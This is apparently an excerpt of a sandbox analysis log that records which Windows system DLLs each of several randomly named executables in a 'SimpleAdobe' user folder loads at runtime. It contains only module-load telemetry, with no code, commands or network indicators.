Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: acgenral.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: winmm.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: samcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: msacm32.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: mpr.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: aclayers.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: sfc.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: d3d11.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: dxgi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: dxcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: devobj.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: webio.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: schannel.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: oleacc.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: riched20.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: usp10.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: msls31.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: edputil.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: slc.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: sppc.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: cscapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Section loaded: uxtheme.dll
